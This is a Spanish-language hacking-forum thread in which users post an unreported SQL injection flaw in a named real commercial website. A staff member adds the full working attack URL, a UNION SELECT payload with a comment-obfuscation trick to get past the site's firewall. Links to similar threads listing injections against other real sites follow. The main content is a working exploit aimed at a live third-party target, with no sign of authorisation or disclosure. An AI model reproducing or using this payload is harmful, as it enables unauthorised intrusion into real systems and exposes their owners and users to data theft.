[SQLI] www.quicktrade.co.in

  • 2 Respuestas
  • 2310 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ---

  • *
  • Underc0der
  • Mensajes: 66
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

[SQLI] www.quicktrade.co.in

  • en: Agosto 03, 2016, 12:00:04 am
Aburrido y buscando algunas páginas me encontre unas cuantas con fallos..





Link: You are not allowed to view links. Register or Login
Payload: You are not allowed to view links. Register or Login*!00000union*/+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14+--+
Autor: Vasyyyl.
Reportado: No
« Última modificación: Agosto 03, 2016, 08:24:52 am por EPSILON »

Desconectado EPSILON

  • *
  • Ex-Staff
  • *****
  • Mensajes: 363
  • Actividad:
    0%
  • Country: 00
  • Reputación 0
  • [email protected]
  • Skype: epsilon.root1
    • Ver Perfil

Re:[SQLI]www.quicktrade.co.in

  • en: Agosto 03, 2016, 08:22:56 am
Le falta información al post, no es suficiente con poner una comilla y mandar un pantallazo, tiene que ser completo, te invito a pasar por You are not allowed to view links. Register or Login reglas para saber como postear bien un bug encontrado, te falto el payload o vector de ataque como este:
Código: You are not allowed to view links. Register or Login
http://www.quicktrade.co.in/category_list.php?id=32+/*!00000union*/+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14+--+Incluso la web tiene un waf que hay que bypassear y no lo mencionaste, bueno ya edito el post y agrego lo que falta.

Saludos!, EPSILON

Desconectado ---

  • *
  • Underc0der
  • Mensajes: 66
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:[SQLI] www.quicktrade.co.in

  • en: Agosto 03, 2016, 11:33:40 am
HOSTIAA es verdad! muchas gracias por añadirlo,se me habia olvidado. En los proximos reportes lo añadiré. Gracias @You are not allowed to view links. Register or Login  ;D

 

[SQLi] leong-leong.com

Iniciado por F0M3T

Respuestas: 0
Vistas: 1771
Último mensaje Abril 10, 2013, 02:39:57 am
por F0M3T
SQLI Double Error Based http://campusvirtual.frsf.utn.edu.ar

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1962
Último mensaje Febrero 19, 2013, 06:59:26 pm
por ANTRAX
SQLI Organo Profesional de los Ingenieros de Caminos Canales y Puertos

Iniciado por hdbreaker

Respuestas: 1
Vistas: 2204
Último mensaje Julio 25, 2013, 10:14:56 pm
por F0M3T
Agujero en servidores de BBDD [Hacking Google + SQLi] - www.kanglin.com.tw

Iniciado por baah

Respuestas: 5
Vistas: 4654
Último mensaje Junio 02, 2017, 06:39:33 am
por baah
SQLI Bypass Admin.asp SocArgentina Investigacion Bioquimica e Ing Molecular

Iniciado por hdbreaker

Respuestas: 1
Vistas: 2457
Último mensaje Marzo 12, 2013, 12:46:44 pm
por Cronos